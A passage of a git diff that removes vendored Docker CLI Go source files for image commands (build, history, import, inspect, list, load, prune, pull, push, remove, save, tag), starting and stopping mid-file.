ref, nil) - } - // Wrap the tar archive to replace the Dockerfile entry with the rewritten - // Dockerfile which uses trusted pulls. 
- buildCtx = replaceDockerfileTarWrapper(ctx, buildCtx, relDockerfile, translator, &resolvedTags) - } - - // Setup an upload progress bar - progressOutput := streamformatter.NewStreamFormatter().NewProgressOutput(progBuff, true) - if !dockerCli.Out().IsTerminal() { - progressOutput = &lastProgressOutput{output: progressOutput} - } - - var body io.Reader = progress.NewProgressReader(buildCtx, progressOutput, 0, "", "Sending build context to Docker daemon") - - var memory int64 - if options.memory != "" { - parsedMemory, err := units.RAMInBytes(options.memory) - if err != nil { - return err - } - memory = parsedMemory - } - - var memorySwap int64 - if options.memorySwap != "" { - if options.memorySwap == "-1" { - memorySwap = -1 - } else { - parsedMemorySwap, err := units.RAMInBytes(options.memorySwap) - if err != nil { - return err - } - memorySwap = parsedMemorySwap - } - } - - var shmSize int64 - if options.shmSize != "" { - shmSize, err = units.RAMInBytes(options.shmSize) - if err != nil { - return err - } - } - - authConfigs, _ := dockerCli.GetAllCredentials() - buildOptions := types.ImageBuildOptions{ - Memory: memory, - MemorySwap: memorySwap, - Tags: options.tags.GetAll(), - SuppressOutput: options.quiet, - NoCache: options.noCache, - Remove: options.rm, - ForceRemove: options.forceRm, - PullParent: options.pull, - Isolation: container.Isolation(options.isolation), - CPUSetCPUs: options.cpuSetCpus, - CPUSetMems: options.cpuSetMems, - CPUShares: options.cpuShares, - CPUQuota: options.cpuQuota, - CPUPeriod: options.cpuPeriod, - CgroupParent: options.cgroupParent, - Dockerfile: relDockerfile, - ShmSize: shmSize, - Ulimits: options.ulimits.GetList(), - BuildArgs: runconfigopts.ConvertKVStringsToMapWithNil(options.buildArgs.GetAll()), - AuthConfigs: authConfigs, - Labels: runconfigopts.ConvertKVStringsToMap(options.labels.GetAll()), - CacheFrom: options.cacheFrom, - SecurityOpt: options.securityOpt, - NetworkMode: options.networkMode, - Squash: options.squash, - } 
- - response, err := dockerCli.Client().ImageBuild(ctx, body, buildOptions) - if err != nil { - if options.quiet { - fmt.Fprintf(dockerCli.Err(), "%s", progBuff) - } - return err - } - defer response.Body.Close() - - err = jsonmessage.DisplayJSONMessagesStream(response.Body, buildBuff, dockerCli.Out().FD(), dockerCli.Out().IsTerminal(), nil) - if err != nil { - if jerr, ok := err.(*jsonmessage.JSONError); ok { - // If no error code is set, default to 1 - if jerr.Code == 0 { - jerr.Code = 1 - } - if options.quiet { - fmt.Fprintf(dockerCli.Err(), "%s%s", progBuff, buildBuff) - } - return cli.StatusError{Status: jerr.Message, StatusCode: jerr.Code} - } - } - - // Windows: show error message about modified file permissions if the - // daemon isn't running Windows. - if response.OSType != "windows" && runtime.GOOS == "windows" && !options.quiet { - fmt.Fprintln(dockerCli.Err(), `SECURITY WARNING: You are building a Docker image from Windows against a non-Windows Docker host. All files and directories added to build context will have '-rwxr-xr-x' permissions. It is recommended to double check and reset permissions for sensitive files and directories.`) - } - - // Everything worked so if -q was provided the output from the daemon - // should be just the image ID and we'll print that to stdout. - if options.quiet { - fmt.Fprintf(dockerCli.Out(), "%s", buildBuff) - } - - if command.IsTrusted() { - // Since the build was successful, now we must tag any of the resolved - // images from the above Dockerfile rewrite. - for _, resolved := range resolvedTags { - if err := TagTrusted(ctx, dockerCli, resolved.digestRef, resolved.tagRef); err != nil { - return err - } - } - } - - return nil -} - -type translatorFunc func(context.Context, reference.NamedTagged) (reference.Canonical, error) - -// validateTag checks if the given image name can be resolved. 
-func validateTag(rawRepo string) (string, error) { - _, err := reference.ParseNamed(rawRepo) - if err != nil { - return "", err - } - - return rawRepo, nil -} - -var dockerfileFromLinePattern = regexp.MustCompile(`(?i)^[\s]*FROM[ \f\r\t\v]+(?P[^ \f\r\t\v\n#]+)`) - -// resolvedTag records the repository, tag, and resolved digest reference -// from a Dockerfile rewrite. -type resolvedTag struct { - digestRef reference.Canonical - tagRef reference.NamedTagged -} - -// rewriteDockerfileFrom rewrites the given Dockerfile by resolving images in -// "FROM " instructions to a digest reference. `translator` is a -// function that takes a repository name and tag reference and returns a -// trusted digest reference. -func rewriteDockerfileFrom(ctx context.Context, dockerfile io.Reader, translator translatorFunc) (newDockerfile []byte, resolvedTags []*resolvedTag, err error) { - scanner := bufio.NewScanner(dockerfile) - buf := bytes.NewBuffer(nil) - - // Scan the lines of the Dockerfile, looking for a "FROM" line. 
- for scanner.Scan() { - line := scanner.Text() - - matches := dockerfileFromLinePattern.FindStringSubmatch(line) - if matches != nil && matches[1] != api.NoBaseImageSpecifier { - // Replace the line with a resolved "FROM repo@digest" - ref, err := reference.ParseNamed(matches[1]) - if err != nil { - return nil, nil, err - } - ref = reference.WithDefaultTag(ref) - if ref, ok := ref.(reference.NamedTagged); ok && command.IsTrusted() { - trustedRef, err := translator(ctx, ref) - if err != nil { - return nil, nil, err - } - - line = dockerfileFromLinePattern.ReplaceAllLiteralString(line, fmt.Sprintf("FROM %s", trustedRef.String())) - resolvedTags = append(resolvedTags, &resolvedTag{ - digestRef: trustedRef, - tagRef: ref, - }) - } - } - - _, err := fmt.Fprintln(buf, line) - if err != nil { - return nil, nil, err - } - } - - return buf.Bytes(), resolvedTags, scanner.Err() -} - -// replaceDockerfileTarWrapper wraps the given input tar archive stream and -// replaces the entry with the given Dockerfile name with the contents of the -// new Dockerfile. Returns a new tar archive stream with the replaced -// Dockerfile. -func replaceDockerfileTarWrapper(ctx context.Context, inputTarStream io.ReadCloser, dockerfileName string, translator translatorFunc, resolvedTags *[]*resolvedTag) io.ReadCloser { - pipeReader, pipeWriter := io.Pipe() - go func() { - tarReader := tar.NewReader(inputTarStream) - tarWriter := tar.NewWriter(pipeWriter) - - defer inputTarStream.Close() - - for { - hdr, err := tarReader.Next() - if err == io.EOF { - // Signals end of archive. - tarWriter.Close() - pipeWriter.Close() - return - } - if err != nil { - pipeWriter.CloseWithError(err) - return - } - - content := io.Reader(tarReader) - if hdr.Name == dockerfileName { - // This entry is the Dockerfile. Since the tar archive was - // generated from a directory on the local filesystem, the - // Dockerfile will only appear once in the archive. 
- var newDockerfile []byte - newDockerfile, *resolvedTags, err = rewriteDockerfileFrom(ctx, content, translator) - if err != nil { - pipeWriter.CloseWithError(err) - return - } - hdr.Size = int64(len(newDockerfile)) - content = bytes.NewBuffer(newDockerfile) - } - - if err := tarWriter.WriteHeader(hdr); err != nil { - pipeWriter.CloseWithError(err) - return - } - - if _, err := io.Copy(tarWriter, content); err != nil { - pipeWriter.CloseWithError(err) - return - } - } - }() - - return pipeReader -} diff --git a/vendor/github.com/docker/docker/cli/command/image/cmd.go b/vendor/github.com/docker/docker/cli/command/image/cmd.go deleted file mode 100644 index c3ca61f85b..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/cmd.go +++ /dev/null @@ -1,33 +0,0 @@ -package image - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewImageCommand returns a cobra command for `image` subcommands -func NewImageCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "image", - Short: "Manage images", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - NewBuildCommand(dockerCli), - NewHistoryCommand(dockerCli), - NewImportCommand(dockerCli), - NewLoadCommand(dockerCli), - NewPullCommand(dockerCli), - NewPushCommand(dockerCli), - NewSaveCommand(dockerCli), - NewTagCommand(dockerCli), - newListCommand(dockerCli), - newRemoveCommand(dockerCli), - newInspectCommand(dockerCli), - NewPruneCommand(dockerCli), - ) - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/image/history.go b/vendor/github.com/docker/docker/cli/command/image/history.go deleted file mode 100644 index 91c8f75a63..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/history.go +++ /dev/null @@ -1,99 +0,0 @@ -package image - -import ( - "fmt" - "strconv" - "strings" - "text/tabwriter" - "time" - - "golang.org/x/net/context" - - 
"github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/stringutils" - "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type historyOptions struct { - image string - - human bool - quiet bool - noTrunc bool -} - -// NewHistoryCommand creates a new `docker history` command -func NewHistoryCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts historyOptions - - cmd := &cobra.Command{ - Use: "history [OPTIONS] IMAGE", - Short: "Show the history of an image", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.image = args[0] - return runHistory(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.BoolVarP(&opts.human, "human", "H", true, "Print sizes and dates in human readable format") - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only show numeric IDs") - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") - - return cmd -} - -func runHistory(dockerCli *command.DockerCli, opts historyOptions) error { - ctx := context.Background() - - history, err := dockerCli.Client().ImageHistory(ctx, opts.image) - if err != nil { - return err - } - - w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) - - if opts.quiet { - for _, entry := range history { - if opts.noTrunc { - fmt.Fprintf(w, "%s\n", entry.ID) - } else { - fmt.Fprintf(w, "%s\n", stringid.TruncateID(entry.ID)) - } - } - w.Flush() - return nil - } - - var imageID string - var createdBy string - var created string - var size string - - fmt.Fprintln(w, "IMAGE\tCREATED\tCREATED BY\tSIZE\tCOMMENT") - for _, entry := range history { - imageID = entry.ID - createdBy = strings.Replace(entry.CreatedBy, "\t", " ", -1) - if !opts.noTrunc { - createdBy = stringutils.Ellipsis(createdBy, 45) - imageID = stringid.TruncateID(entry.ID) - } - - if opts.human { - created = units.HumanDuration(time.Now().UTC().Sub(time.Unix(entry.Created, 0))) + 
" ago" - size = units.HumanSizeWithPrecision(float64(entry.Size), 3) - } else { - created = time.Unix(entry.Created, 0).Format(time.RFC3339) - size = strconv.FormatInt(entry.Size, 10) - } - - fmt.Fprintf(w, "%s\t%s\t%s\t%s\t%s\n", imageID, created, createdBy, size, entry.Comment) - } - w.Flush() - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/image/import.go b/vendor/github.com/docker/docker/cli/command/image/import.go deleted file mode 100644 index 60024fb53c..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/import.go +++ /dev/null @@ -1,88 +0,0 @@ -package image - -import ( - "io" - "os" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - dockeropts "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/pkg/urlutil" - "github.com/spf13/cobra" -) - -type importOptions struct { - source string - reference string - changes dockeropts.ListOpts - message string -} - -// NewImportCommand creates a new `docker import` command -func NewImportCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts importOptions - - cmd := &cobra.Command{ - Use: "import [OPTIONS] file|URL|- [REPOSITORY[:TAG]]", - Short: "Import the contents from a tarball to create a filesystem image", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.source = args[0] - if len(args) > 1 { - opts.reference = args[1] - } - return runImport(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - opts.changes = dockeropts.NewListOpts(nil) - flags.VarP(&opts.changes, "change", "c", "Apply Dockerfile instruction to the created image") - flags.StringVarP(&opts.message, "message", "m", "", "Set commit message for imported image") - - return cmd -} - -func runImport(dockerCli *command.DockerCli, opts importOptions) error { - var ( - in io.Reader - srcName = opts.source - ) - - 
if opts.source == "-" { - in = dockerCli.In() - } else if !urlutil.IsURL(opts.source) { - srcName = "-" - file, err := os.Open(opts.source) - if err != nil { - return err - } - defer file.Close() - in = file - } - - source := types.ImageImportSource{ - Source: in, - SourceName: srcName, - } - - options := types.ImageImportOptions{ - Message: opts.message, - Changes: opts.changes.GetAll(), - } - - clnt := dockerCli.Client() - - responseBody, err := clnt.ImageImport(context.Background(), source, opts.reference, options) - if err != nil { - return err - } - defer responseBody.Close() - - return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil) -} diff --git a/vendor/github.com/docker/docker/cli/command/image/inspect.go b/vendor/github.com/docker/docker/cli/command/image/inspect.go deleted file mode 100644 index 217863c772..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/inspect.go +++ /dev/null @@ -1,44 +0,0 @@ -package image - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - "github.com/spf13/cobra" -) - -type inspectOptions struct { - format string - refs []string -} - -// newInspectCommand creates a new cobra.Command for `docker image inspect` -func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] IMAGE [IMAGE...]", - Short: "Display detailed information on one or more images", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.refs = args - return runInspect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - return cmd -} - -func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - 
getRefFunc := func(ref string) (interface{}, []byte, error) { - return client.ImageInspectWithRaw(ctx, ref) - } - return inspect.Inspect(dockerCli.Out(), opts.refs, opts.format, getRefFunc) -} diff --git a/vendor/github.com/docker/docker/cli/command/image/list.go b/vendor/github.com/docker/docker/cli/command/image/list.go deleted file mode 100644 index 679604fc02..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/list.go +++ /dev/null @@ -1,96 +0,0 @@ -package image - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/formatter" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" -) - -type imagesOptions struct { - matchName string - - quiet bool - all bool - noTrunc bool - showDigests bool - format string - filter opts.FilterOpt -} - -// NewImagesCommand creates a new `docker images` command -func NewImagesCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := imagesOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "images [OPTIONS] [REPOSITORY[:TAG]]", - Short: "List images", - Args: cli.RequiresMaxArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - if len(args) > 0 { - opts.matchName = args[0] - } - return runImages(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only show numeric IDs") - flags.BoolVarP(&opts.all, "all", "a", false, "Show all images (default hides intermediate images)") - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") - flags.BoolVar(&opts.showDigests, "digests", false, "Show digests") - flags.StringVar(&opts.format, "format", "", "Pretty-print images using a Go template") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - - return cmd -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd 
:= *NewImagesCommand(dockerCli) - cmd.Aliases = []string{"images", "list"} - cmd.Use = "ls [OPTIONS] [REPOSITORY[:TAG]]" - return &cmd -} - -func runImages(dockerCli *command.DockerCli, opts imagesOptions) error { - ctx := context.Background() - - filters := opts.filter.Value() - if opts.matchName != "" { - filters.Add("reference", opts.matchName) - } - - options := types.ImageListOptions{ - All: opts.all, - Filters: filters, - } - - images, err := dockerCli.Client().ImageList(ctx, options) - if err != nil { - return err - } - - format := opts.format - if len(format) == 0 { - if len(dockerCli.ConfigFile().ImagesFormat) > 0 && !opts.quiet { - format = dockerCli.ConfigFile().ImagesFormat - } else { - format = formatter.TableFormatKey - } - } - - imageCtx := formatter.ImageContext{ - Context: formatter.Context{ - Output: dockerCli.Out(), - Format: formatter.NewImageFormat(format, opts.quiet, opts.showDigests), - Trunc: !opts.noTrunc, - }, - Digest: opts.showDigests, - } - return formatter.ImageWrite(imageCtx, images) -} diff --git a/vendor/github.com/docker/docker/cli/command/image/load.go b/vendor/github.com/docker/docker/cli/command/image/load.go deleted file mode 100644 index 988f5106e2..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/load.go +++ /dev/null @@ -1,77 +0,0 @@ -package image - -import ( - "fmt" - "io" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/pkg/system" - "github.com/spf13/cobra" -) - -type loadOptions struct { - input string - quiet bool -} - -// NewLoadCommand creates a new `docker load` command -func NewLoadCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts loadOptions - - cmd := &cobra.Command{ - Use: "load [OPTIONS]", - Short: "Load an image from a tar archive or STDIN", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runLoad(dockerCli, 
opts) - }, - } - - flags := cmd.Flags() - - flags.StringVarP(&opts.input, "input", "i", "", "Read from tar archive file, instead of STDIN") - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Suppress the load output") - - return cmd -} - -func runLoad(dockerCli *command.DockerCli, opts loadOptions) error { - - var input io.Reader = dockerCli.In() - if opts.input != "" { - // We use system.OpenSequential to use sequential file access on Windows, avoiding - // depleting the standby list un-necessarily. On Linux, this equates to a regular os.Open. - file, err := system.OpenSequential(opts.input) - if err != nil { - return err - } - defer file.Close() - input = file - } - - // To avoid getting stuck, verify that a tar file is given either in - // the input flag or through stdin and if not display an error message and exit. - if opts.input == "" && dockerCli.In().IsTerminal() { - return fmt.Errorf("requested load from stdin, but stdin is empty") - } - - if !dockerCli.Out().IsTerminal() { - opts.quiet = true - } - response, err := dockerCli.Client().ImageLoad(context.Background(), input, opts.quiet) - if err != nil { - return err - } - defer response.Body.Close() - - if response.Body != nil && response.JSON { - return jsonmessage.DisplayJSONMessagesToStream(response.Body, dockerCli.Out(), nil) - } - - _, err = io.Copy(dockerCli.Out(), response.Body) - return err -} diff --git a/vendor/github.com/docker/docker/cli/command/image/prune.go b/vendor/github.com/docker/docker/cli/command/image/prune.go deleted file mode 100644 index 82c28fcf49..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/prune.go +++ /dev/null @@ -1,92 +0,0 @@ -package image - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - units "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type pruneOptions struct { - force bool - all bool -} - -// 
NewPruneCommand returns a new cobra prune command for images -func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts pruneOptions - - cmd := &cobra.Command{ - Use: "prune [OPTIONS]", - Short: "Remove unused images", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - spaceReclaimed, output, err := runPrune(dockerCli, opts) - if err != nil { - return err - } - if output != "" { - fmt.Fprintln(dockerCli.Out(), output) - } - fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) - return nil - }, - Tags: map[string]string{"version": "1.25"}, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") - flags.BoolVarP(&opts.all, "all", "a", false, "Remove all unused images, not just dangling ones") - - return cmd -} - -const ( - allImageWarning = `WARNING! This will remove all images without at least one container associated to them. -Are you sure you want to continue?` - danglingWarning = `WARNING! This will remove all dangling images. 
-Are you sure you want to continue?` -) - -func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) { - pruneFilters := filters.NewArgs() - pruneFilters.Add("dangling", fmt.Sprintf("%v", !opts.all)) - - warning := danglingWarning - if opts.all { - warning = allImageWarning - } - if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { - return - } - - report, err := dockerCli.Client().ImagesPrune(context.Background(), pruneFilters) - if err != nil { - return - } - - if len(report.ImagesDeleted) > 0 { - output = "Deleted Images:\n" - for _, st := range report.ImagesDeleted { - if st.Untagged != "" { - output += fmt.Sprintln("untagged:", st.Untagged) - } else { - output += fmt.Sprintln("deleted:", st.Deleted) - } - } - spaceReclaimed = report.SpaceReclaimed - } - - return -} - -// RunPrune calls the Image Prune API -// This returns the amount of space reclaimed and a detailed output string -func RunPrune(dockerCli *command.DockerCli, all bool) (uint64, string, error) { - return runPrune(dockerCli, pruneOptions{force: true, all: all}) -} diff --git a/vendor/github.com/docker/docker/cli/command/image/pull.go b/vendor/github.com/docker/docker/cli/command/image/pull.go deleted file mode 100644 index 24933fe846..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/pull.go +++ /dev/null @@ -1,84 +0,0 @@ -package image - -import ( - "errors" - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" - "github.com/spf13/cobra" -) - -type pullOptions struct { - remote string - all bool -} - -// NewPullCommand creates a new `docker pull` command -func NewPullCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts pullOptions - - cmd := &cobra.Command{ - Use: "pull [OPTIONS] NAME[:TAG|@DIGEST]", - Short: "Pull an image or 
a repository from a registry", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.remote = args[0] - return runPull(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.BoolVarP(&opts.all, "all-tags", "a", false, "Download all tagged images in the repository") - command.AddTrustedFlags(flags, true) - - return cmd -} - -func runPull(dockerCli *command.DockerCli, opts pullOptions) error { - distributionRef, err := reference.ParseNamed(opts.remote) - if err != nil { - return err - } - if opts.all && !reference.IsNameOnly(distributionRef) { - return errors.New("tag can't be used with --all-tags/-a") - } - - if !opts.all && reference.IsNameOnly(distributionRef) { - distributionRef = reference.WithDefaultTag(distributionRef) - fmt.Fprintf(dockerCli.Out(), "Using default tag: %s\n", reference.DefaultTag) - } - - // Resolve the Repository name from fqn to RepositoryInfo - repoInfo, err := registry.ParseRepositoryInfo(distributionRef) - if err != nil { - return err - } - - ctx := context.Background() - - authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) - requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfo.Index, "pull") - - // Check if reference has a digest - _, isCanonical := distributionRef.(reference.Canonical) - if command.IsTrusted() && !isCanonical { - err = trustedPull(ctx, dockerCli, repoInfo, distributionRef, authConfig, requestPrivilege) - } else { - err = imagePullPrivileged(ctx, dockerCli, authConfig, distributionRef.String(), requestPrivilege, opts.all) - } - if err != nil { - if strings.Contains(err.Error(), "target is plugin") { - return errors.New(err.Error() + " - Use `docker plugin install`") - } - return err - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/image/push.go b/vendor/github.com/docker/docker/cli/command/image/push.go deleted file mode 100644 index a8ce4945ec..0000000000 --- 
a/vendor/github.com/docker/docker/cli/command/image/push.go +++ /dev/null @@ -1,61 +0,0 @@ -package image - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" - "github.com/spf13/cobra" -) - -// NewPushCommand creates a new `docker push` command -func NewPushCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "push [OPTIONS] NAME[:TAG]", - Short: "Push an image or a repository to a registry", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runPush(dockerCli, args[0]) - }, - } - - flags := cmd.Flags() - - command.AddTrustedFlags(flags, true) - - return cmd -} - -func runPush(dockerCli *command.DockerCli, remote string) error { - ref, err := reference.ParseNamed(remote) - if err != nil { - return err - } - - // Resolve the Repository name from fqn to RepositoryInfo - repoInfo, err := registry.ParseRepositoryInfo(ref) - if err != nil { - return err - } - - ctx := context.Background() - - // Resolve the Auth config relevant for this server - authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) - requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfo.Index, "push") - - if command.IsTrusted() { - return trustedPush(ctx, dockerCli, repoInfo, ref, authConfig, requestPrivilege) - } - - responseBody, err := imagePushPrivileged(ctx, dockerCli, authConfig, ref.String(), requestPrivilege) - if err != nil { - return err - } - - defer responseBody.Close() - return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil) -} diff --git a/vendor/github.com/docker/docker/cli/command/image/remove.go b/vendor/github.com/docker/docker/cli/command/image/remove.go deleted file mode 100644 index c79ceba7a8..0000000000 --- 
a/vendor/github.com/docker/docker/cli/command/image/remove.go +++ /dev/null @@ -1,77 +0,0 @@ -package image - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type removeOptions struct { - force bool - noPrune bool -} - -// NewRemoveCommand creates a new `docker remove` command -func NewRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts removeOptions - - cmd := &cobra.Command{ - Use: "rmi [OPTIONS] IMAGE [IMAGE...]", - Short: "Remove one or more images", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runRemove(dockerCli, opts, args) - }, - } - - flags := cmd.Flags() - - flags.BoolVarP(&opts.force, "force", "f", false, "Force removal of the image") - flags.BoolVar(&opts.noPrune, "no-prune", false, "Do not delete untagged parents") - - return cmd -} - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := *NewRemoveCommand(dockerCli) - cmd.Aliases = []string{"rmi", "remove"} - cmd.Use = "rm [OPTIONS] IMAGE [IMAGE...]" - return &cmd -} - -func runRemove(dockerCli *command.DockerCli, opts removeOptions, images []string) error { - client := dockerCli.Client() - ctx := context.Background() - - options := types.ImageRemoveOptions{ - Force: opts.force, - PruneChildren: !opts.noPrune, - } - - var errs []string - for _, image := range images { - dels, err := client.ImageRemove(ctx, image, options) - if err != nil { - errs = append(errs, err.Error()) - } else { - for _, del := range dels { - if del.Deleted != "" { - fmt.Fprintf(dockerCli.Out(), "Deleted: %s\n", del.Deleted) - } else { - fmt.Fprintf(dockerCli.Out(), "Untagged: %s\n", del.Untagged) - } - } - } - } - - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/image/save.go 
b/vendor/github.com/docker/docker/cli/command/image/save.go deleted file mode 100644 index bbe82d2a05..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/save.go +++ /dev/null @@ -1,57 +0,0 @@ -package image - -import ( - "errors" - "io" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type saveOptions struct { - images []string - output string -} - -// NewSaveCommand creates a new `docker save` command -func NewSaveCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts saveOptions - - cmd := &cobra.Command{ - Use: "save [OPTIONS] IMAGE [IMAGE...]", - Short: "Save one or more images to a tar archive (streamed to STDOUT by default)", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.images = args - return runSave(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.StringVarP(&opts.output, "output", "o", "", "Write to a file, instead of STDOUT") - - return cmd -} - -func runSave(dockerCli *command.DockerCli, opts saveOptions) error { - if opts.output == "" && dockerCli.Out().IsTerminal() { - return errors.New("Cowardly refusing to save to a terminal. 
Use the -o flag or redirect.") - } - - responseBody, err := dockerCli.Client().ImageSave(context.Background(), opts.images) - if err != nil { - return err - } - defer responseBody.Close() - - if opts.output == "" { - _, err := io.Copy(dockerCli.Out(), responseBody) - return err - } - - return command.CopyToFile(opts.output, responseBody) -} diff --git a/vendor/github.com/docker/docker/cli/command/image/tag.go b/vendor/github.com/docker/docker/cli/command/image/tag.go deleted file mode 100644 index fb2b703856..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/tag.go +++ /dev/null @@ -1,41 +0,0 @@ -package image - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type tagOptions struct { - image string - name string -} - -// NewTagCommand creates a new `docker tag` command -func NewTagCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts tagOptions - - cmd := &cobra.Command{ - Use: "tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG]", - Short: "Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE", - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - opts.image = args[0] - opts.name = args[1] - return runTag(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.SetInterspersed(false) - - return cmd -} - -func runTag(dockerCli *command.DockerCli, opts tagOptions) error { - ctx := context.Background() - - return dockerCli.Client().ImageTag(ctx, opts.image, opts.name) -} diff --git a/vendor/github.com/docker/docker/cli/command/image/trust.go b/vendor/github.com/docker/docker/cli/command/image/trust.go deleted file mode 100644 index 5136a22156..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/trust.go +++ /dev/null @@ -1,381 +0,0 @@ -package image - -import ( - "encoding/hex" - "encoding/json" - "errors" - "fmt" - "io" - "path" - "sort" - - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" - 
